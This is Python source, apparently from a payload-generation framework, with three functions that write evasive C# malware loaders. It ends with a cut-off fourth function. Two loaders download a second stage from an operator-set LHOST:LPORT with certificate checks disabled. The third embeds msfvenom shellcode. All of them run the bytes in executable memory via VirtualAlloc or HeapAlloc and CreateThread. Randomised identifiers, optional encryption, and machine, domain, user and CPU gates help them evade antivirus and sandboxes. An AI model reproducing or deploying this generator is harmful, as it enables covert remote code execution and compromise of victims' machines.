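    def generate(self):
        """Generate the C# source of an HTTPS stager and store it on ``self``.

        The emitted program's ``Main()`` runs the optional environment gates
        selected in ``self.required_options``, requests
        ``https://LHOST:LPORT/<uri>`` (``<uri>`` is a random string whose
        8-bit character-sum checksum is 92), and hands the downloaded bytes
        to an ``inject()`` that copies them into executable memory and starts
        a thread on them (INJECT_METHOD "virtual" -> VirtualAlloc, "heap" ->
        HeapCreate/HeapAlloc).  Every identifier in the C# is a fresh
        ``evasion_helpers.randomString()``.

        Options read as ``self.required_options[NAME][0]``: INJECT_METHOD,
        EXPIRE_PAYLOAD, HOSTNAME, DOMAIN, PROCESSORS, USERNAME (a value of
        "x" disables that gate), LHOST, LPORT, USE_ARYA.

        Result: ``self.payload_source_code`` is set (passed through
        ``encryption.arya`` when USE_ARYA is "y"); nothing is returned.

        Raises:
            ValueError: EXPIRE_PAYLOAD is enabled but is not a number.

        Operator caveats (deliberately left as they are):
          * The emitted certificate callback returns true for every
            certificate, so the listener may use a self-signed cert -- but
            the stage download is therefore unauthenticated and anything on
            the path can substitute a different stage.
          * Option values are spliced into the C# verbatim; a value containing
            a quote or backslash yields source that will not compile.
        """
        import datetime  # function-scope: the module import block is outside this view

        opts = self.required_options
        inject_method = opts["INJECT_METHOD"][0].lower()

        # imports and namespace setup
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
        payload_code += "namespace %s { class %s {\n" % (
            evasion_helpers.randomString(), evasion_helpers.randomString())

        # alphabet for the emitted randomString(); shuffled per build so the
        # string literal differs between payloads
        randomStringName = evasion_helpers.randomString()
        bufferName = evasion_helpers.randomString()
        charsName = evasion_helpers.randomString()
        t = list(
            "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
        random.shuffle(t)
        chars = ''.join(t)

        # certificate callback that accepts any server certificate (see the
        # docstring for what that costs)
        validateServerCertficateName = evasion_helpers.randomString()
        payload_code += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" % (
            validateServerCertficateName)

        # randomString(Random r, int s): s characters drawn from `chars`
        payload_code += "static string %s(Random r, int s) {\n" % (
            randomStringName)
        payload_code += "char[] %s = new char[s];\n" % (bufferName)
        payload_code += "string %s = \"%s\";\n" % (charsName, chars)
        payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (
            bufferName, charsName, charsName)
        payload_code += "return new string(%s);}\n" % (bufferName)

        # checksum8(string s): true when the sum of s's chars mod 0x100 == 92
        checksum8Name = evasion_helpers.randomString()
        payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (
            checksum8Name)

        # genHTTPChecksum(Random r): up to 64 rounds of a 3-char base plus one
        # char of a re-shuffled alphabet until checksum8() accepts the URI;
        # "9vXU" (57+118+88+85 = 348, 348 mod 256 = 92) is the fallback
        genHTTPChecksumName = evasion_helpers.randomString()
        baseStringName = evasion_helpers.randomString()
        randCharsName = evasion_helpers.randomString()
        urlName = evasion_helpers.randomString()
        random.shuffle(t)
        randChars = ''.join(t)

        payload_code += "static string %s(Random r) { string %s = \"\";\n" % (
            genHTTPChecksumName, baseStringName)
        payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (
            baseStringName, randomStringName)
        payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (
            randCharsName, randChars)
        payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (
            randCharsName)
        payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName,
                                                       randCharsName)
        payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (
            checksum8Name, urlName, urlName)

        # getData(string url): download the stage with browser-like headers;
        # a body under 100000 bytes or a WebException yields null, which
        # inject() treats as "nothing to run".  The validation callback is a
        # static property, i.e. it applies to the whole process.
        getDataName = evasion_helpers.randomString()
        strName = evasion_helpers.randomString()
        webClientName = evasion_helpers.randomString()
        sName = evasion_helpers.randomString()

        payload_code += "static byte[] %s(string %s) {\n" % (getDataName,
                                                             strName)
        payload_code += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" % (
            validateServerCertficateName)
        payload_code += "WebClient %s = new System.Net.WebClient();\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (
            webClientName)
        payload_code += "byte[] %s = null;\n" % (sName)
        payload_code += "try { %s = %s.DownloadData(%s);\n" % (
            sName, webClientName, strName)
        payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
        payload_code += "catch (WebException) {}\n"
        payload_code += "return %s;}\n" % (sName)

        # inject(byte[] s): copy the stage into executable memory, start a
        # thread on it and block until that thread exits
        injectName = evasion_helpers.randomString()
        sName = evasion_helpers.randomString()
        funcAddrName = evasion_helpers.randomString()
        hThreadName = evasion_helpers.randomString()
        threadIdName = evasion_helpers.randomString()
        pinfoName = evasion_helpers.randomString()

        if inject_method == "virtual":
            # VirtualAlloc(0, len, 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE)
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                sName, funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif inject_method == "heap":
            # NOTE(review): 0x00040000 / 0x00000008 are presumably
            # HEAP_CREATE_ENABLE_EXECUTE / HEAP_ZERO_MEMORY -- confirm against
            # winbase.h before relying on that reading
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        # Main(): optional gates (each opens a brace counted in curlyCount),
        # then download and inject
        sName = evasion_helpers.randomString()
        randomName = evasion_helpers.randomString()
        curlyCount = 0

        payload_code += "static void Main(){\n"

        if opts["EXPIRE_PAYLOAD"][0].lower() != "x":

            RandToday = evasion_helpers.randomString()
            RandExpire = evasion_helpers.randomString()

            # The kill date is fixed here, at generation time.  The previous
            # revision emitted `expire = today.AddDays(N); if (expire < today)`
            # with both values taken on the target, which is false for every
            # N >= 0, so an "expiring" payload never ran at all.  Day
            # granularity, compared against the target's local date.
            kill_date = datetime.date.today() + datetime.timedelta(
                days=float(opts["EXPIRE_PAYLOAD"][0]))
            payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format(
                RandToday)
            payload_code += '\t' * curlyCount + 'DateTime {} = new DateTime({}, {}, {});\n'.format(
                RandExpire, kill_date.year, kill_date.month, kill_date.day)
            payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format(
                RandToday, RandExpire)

            # Add a tab for this check
            curlyCount += 1

        if opts["HOSTNAME"][0].lower() != "x":

            # substring match on the lower-cased machine name
            payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(
                opts["HOSTNAME"][0].lower())

            # Add a tab for this check
            curlyCount += 1

        if opts["DOMAIN"][0].lower() != "x":

            # DOMAIN is only a switch: the gate checks that the machine name
            # differs from the user's domain name (i.e. a domain-joined host);
            # the option's value itself is not used
            payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'

            # Add a tab for this check
            curlyCount += 1

        if opts["PROCESSORS"][0].lower() != "x":

            payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(
                opts["PROCESSORS"][0])

            # Add a tab for this check
            curlyCount += 1

        if opts["USERNAME"][0].lower() != "x":

            rand_user_name = evasion_helpers.randomString()
            rand_char_name = evasion_helpers.randomString()

            # NOTE(review): indexes [1] of the '\'-split identity name, so a
            # name with no backslash throws IndexOutOfRangeException on the
            # target (the payload then simply does not run)
            payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(
                rand_user_name)
            payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format(
                rand_char_name, rand_user_name)
            payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format(
                rand_char_name, opts["USERNAME"][0])

            # Add a tab for this check
            curlyCount += 1

        payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (
            randomName)
        payload_code += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" % (
            sName, getDataName, opts["LHOST"][0],
            opts["LPORT"][0], genHTTPChecksumName, randomName)
        payload_code += "%s(%s);}\n" % (injectName, sName)

        # close one brace per gate opened above
        while curlyCount != 0:
            payload_code += '\t' * curlyCount + '}'
            curlyCount -= 1

        # P/Invoke declarations with randomised parameter names; the trailing
        # "}}" closes the class and the namespace
        if inject_method == "virtual":
            r = [evasion_helpers.randomString() for _ in range(12)]
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % tuple(r)
        elif inject_method == "heap":
            y = [evasion_helpers.randomString() for _ in range(17)]
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % tuple(y)

        if opts["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return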
    def generate(self) -> None:
        """Generate the C# source of a plain-HTTP stager and store it on ``self``.

        The emitted program's ``Main()`` runs whatever gate code
        ``gamemaker.senecas_games(self)`` returns, requests
        ``http://LHOST:LPORT/<uri>`` (``<uri>`` is a random string whose 8-bit
        character-sum checksum is 92) and hands the downloaded bytes to an
        ``inject()`` that copies them into executable memory and starts a
        thread on them (INJECT_METHOD "virtual" -> VirtualAlloc, "heap" ->
        HeapCreate/HeapAlloc).  Every identifier in the C# is a fresh
        ``helpers.randomString()``.

        Options read as ``self.required_options[NAME][0]``: INJECT_METHOD,
        LHOST, LPORT, USE_ARYA (the gate options are read by gamemaker).

        Result: ``self.payload_source_code`` is set (passed through
        ``encryption.arya`` when USE_ARYA is "y"); nothing is returned.

        Operator caveat: the stage travels over cleartext HTTP and nothing in
        the emitted code checks its integrity beyond a minimum length, so an
        on-path party can observe or replace it.
        """

        # imports and namespace setup
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
        payload_code += "namespace %s { class %s {\n" % (
            helpers.randomString(), helpers.randomString())

        # code for the randomString() function; the alphabet literal is
        # shuffled per build so it differs between payloads
        randomStringName = helpers.randomString()
        bufferName = helpers.randomString()
        charsName = helpers.randomString()
        t = list(
            "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
        random.shuffle(t)
        chars = ''.join(t)

        # randomString(Random r, int s): s characters drawn from `chars`
        payload_code += "static string %s(Random r, int s) {\n" % (
            randomStringName)
        payload_code += "char[] %s = new char[s];\n" % (bufferName)
        payload_code += "string %s = \"%s\";\n" % (charsName, chars)
        payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (
            bufferName, charsName, charsName)
        payload_code += "return new string(%s);}\n" % (bufferName)

        # checksum8(string s): true when the sum of s's chars mod 0x100 == 92
        checksum8Name = helpers.randomString()
        payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (
            checksum8Name)

        # code for the genHTTPChecksum() function: up to 64 rounds of a
        # 3-char base plus one char of a re-shuffled alphabet until
        # checksum8() accepts the URI; "9vXU" (57+118+88+85 = 348, and
        # 348 mod 256 = 92) is the fallback
        genHTTPChecksumName = helpers.randomString()
        baseStringName = helpers.randomString()
        randCharsName = helpers.randomString()
        urlName = helpers.randomString()
        random.shuffle(t)
        randChars = ''.join(t)

        payload_code += "static string %s(Random r) { string %s = \"\";\n" % (
            genHTTPChecksumName, baseStringName)
        payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (
            baseStringName, randomStringName)
        payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (
            randCharsName, randChars)
        payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (
            randCharsName)
        payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName,
                                                       randCharsName)
        payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (
            checksum8Name, urlName, urlName)

        # code for getData() function: download the stage with browser-like
        # headers; a body under 100000 bytes or a WebException yields null,
        # which inject() treats as "nothing to run"
        getDataName = helpers.randomString()
        strName = helpers.randomString()
        webClientName = helpers.randomString()
        sName = helpers.randomString()

        payload_code += "static byte[] %s(string %s) {\n" % (getDataName,
                                                             strName)
        payload_code += "WebClient %s = new System.Net.WebClient();\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (
            webClientName)
        payload_code += "byte[] %s = null;\n" % (sName)
        payload_code += "try { %s = %s.DownloadData(%s);\n" % (
            sName, webClientName, strName)
        payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
        payload_code += "catch (WebException) {}\n"
        payload_code += "return %s;}\n" % (sName)

        # code for the inject() function: copy the stage into executable
        # memory, start a thread on it and block until that thread exits
        injectName = helpers.randomString()
        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            # VirtualAlloc(0, len, 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE)
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                sName, funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            # NOTE(review): 0x00040000 / 0x00000008 are presumably
            # HEAP_CREATE_ENABLE_EXECUTE / HEAP_ZERO_MEMORY -- confirm against
            # winbase.h before relying on that reading
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        # code for Main() to launch everything
        sName = helpers.randomString()
        randomName = helpers.randomString()
        curlyCount = 0

        payload_code += "static void Main(){\n"

        # gate code comes from gamemaker; curlyCount is the number of braces
        # it left open, closed again after the inject call below
        payload_code2, curlyCount = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2

        payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (
            randomName)
        # LHOST/LPORT are spliced in verbatim -- no quoting or validation
        payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % (
            sName, getDataName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
        payload_code += "%s(%s);}\n" % (injectName, sName)

        while (curlyCount != 0):
            payload_code += '\t' * curlyCount + '}'
            curlyCount -= 1

        # get random variables for the API imports (only the list matching
        # INJECT_METHOD is used); the trailing "}}" closes class and namespace
        r = [helpers.randomString() for x in range(12)]
        y = [helpers.randomString() for x in range(17)]
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])

        if self.required_options["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return
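    def generate(self):
        """Generate C# source that runs embedded shellcode in-process.

        Unlike the staged variants the shellcode is compiled into the program
        as a ``byte[]`` initialiser.  ``Main()`` runs the optional environment
        gates selected in ``self.required_options``, then copies the bytes
        into executable memory and starts a thread on them (INJECT_METHOD
        "virtual" -> VirtualAlloc, "heap" -> HeapCreate/HeapAlloc), waiting
        for that thread to finish.

        Shellcode comes from ``self.cli_shellcode`` when set, otherwise from
        ``self.shellcode.generate(self.cli_opts)``; ``self.payload_type`` is
        recorded as the msfvenom payload, the payload choice, or 'custom'.
        The escaped-string form ("\\x41\\x42...") is expected.

        Options read as ``self.required_options[NAME][0]``: INJECT_METHOD,
        EXPIRE_PAYLOAD, HOSTNAME, DOMAIN, PROCESSORS, USERNAME ("x" disables
        that gate), USE_ARYA.

        Result: ``self.payload_source_code`` is set (passed through
        ``encryption.arya`` when USE_ARYA is "y"); nothing is returned.

        Raises:
            ValueError: EXPIRE_PAYLOAD is enabled but is not a number.

        Operator caveat: option values are spliced into the C# verbatim; a
        value containing a quote or backslash yields source that will not
        compile.
        """
        import datetime  # function-scope: the module import block is outside this view

        opts = self.required_options
        inject_method = opts["INJECT_METHOD"][0].lower()

        # Generate the shellcode and record where it came from
        if not self.cli_shellcode:
            Shellcode = self.shellcode.generate(self.cli_opts)
            if self.shellcode.msfvenompayload:
                self.payload_type = self.shellcode.msfvenompayload
            elif self.shellcode.payload_choice:
                self.payload_type = self.shellcode.payload_choice
                self.shellcode.payload_choice = ''
            else:
                # assume custom shellcode
                self.payload_type = 'custom'
        else:
            Shellcode = self.cli_shellcode
        # "\x41\x42" -> "0x41,0x42": the body of a C# byte[] initialiser
        Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])

        # randomize all our variable names, yo'
        namespaceName = evasion_helpers.randomString()
        className = evasion_helpers.randomString()
        bytearrayName = evasion_helpers.randomString()
        funcAddrName = evasion_helpers.randomString()

        hThreadName = evasion_helpers.randomString()
        threadIdName = evasion_helpers.randomString()
        pinfoName = evasion_helpers.randomString()
        num_tabs_required = 0

        #required syntax at the beginning of any/all payloads
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
        payload_code += "namespace %s { class %s  {\n" % (namespaceName,
                                                          className)

        # P/Invoke declarations with randomised parameter names
        if inject_method == "virtual":
            r = [evasion_helpers.randomString() for _ in range(12)]
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % tuple(r)
        elif inject_method == "heap":
            y = [evasion_helpers.randomString() for _ in range(17)]
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % tuple(y)
        payload_code += "static void Main() {\n"
        # namespace and class braces are closed by the loop at the end
        num_tabs_required += 2

        if opts["EXPIRE_PAYLOAD"][0].lower() != "x":

            RandToday = evasion_helpers.randomString()
            RandExpire = evasion_helpers.randomString()

            # The kill date is fixed here, at generation time.  The previous
            # revision emitted `expire = today.AddDays(N); if (expire < today)`
            # with both values taken on the target, which is false for every
            # N >= 0, so an "expiring" payload never ran at all.  Day
            # granularity, compared against the target's local date.
            kill_date = datetime.date.today() + datetime.timedelta(
                days=float(opts["EXPIRE_PAYLOAD"][0]))
            payload_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format(
                RandToday)
            payload_code += '\t' * num_tabs_required + 'DateTime {} = new DateTime({}, {}, {});\n'.format(
                RandExpire, kill_date.year, kill_date.month, kill_date.day)
            payload_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format(
                RandToday, RandExpire)

            # Add a tab for this check
            num_tabs_required += 1

        if opts["HOSTNAME"][0].lower() != "x":

            # substring match on the lower-cased machine name
            payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(
                opts["HOSTNAME"][0].lower())

            # Add a tab for this check
            num_tabs_required += 1

        if opts["DOMAIN"][0].lower() != "x":

            # DOMAIN is only a switch: the gate checks that the machine name
            # differs from the user's domain name (i.e. a domain-joined host);
            # the option's value itself is not used
            payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'

            # Add a tab for this check
            num_tabs_required += 1

        if opts["PROCESSORS"][0].lower() != "x":

            payload_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(
                opts["PROCESSORS"][0])

            # Add a tab for this check
            num_tabs_required += 1

        if opts["USERNAME"][0].lower() != "x":

            rand_user_name = evasion_helpers.randomString()
            rand_char_name = evasion_helpers.randomString()

            # NOTE(review): indexes [1] of the '\'-split identity name, so a
            # name with no backslash throws IndexOutOfRangeException on the
            # target (the payload then simply does not run)
            payload_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(
                rand_user_name)
            payload_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format(
                rand_char_name, rand_user_name)
            payload_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format(
                rand_char_name, opts["USERNAME"][0])

            # Add a tab for this check
            num_tabs_required += 1

        if inject_method == "virtual":
            # VirtualAlloc(0, len, 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE);
            # the trailing "}" closes Main()
            payload_code += "byte[] %s = {%s};" % (bytearrayName, Shellcode)

            payload_code += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, bytearrayName)
            payload_code += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                bytearrayName, funcAddrName, bytearrayName)
            payload_code += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName, threadIdName, pinfoName)
            payload_code += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % (
                hThreadName)

        elif inject_method == "heap":

            rand_heap = evasion_helpers.randomString()
            rand_ptr = evasion_helpers.randomString()
            rand_var = evasion_helpers.randomString()

            # NOTE(review): 0x00040000 / 0x00000008 are presumably
            # HEAP_CREATE_ENABLE_EXECUTE / HEAP_ZERO_MEMORY -- confirm against
            # winbase.h before relying on that reading; the trailing "}"
            # closes Main()
            payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};\n" % (
                bytearrayName, Shellcode)
            payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                rand_heap, bytearrayName)
            payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                rand_ptr, rand_heap, bytearrayName)
            payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                rand_ptr, bytearrayName, bytearrayName)
            payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format(
                rand_var)
            payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, rand_ptr, rand_var)
            payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format(
                hThreadName)

        # close the gates, the class and the namespace
        while num_tabs_required != 0:
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1

        if opts["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return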
    def generate(self):

        # Generate the shellcode
        if not self.cli_shellcode:
            Shellcode = self.shellcode.generate(self.cli_opts)
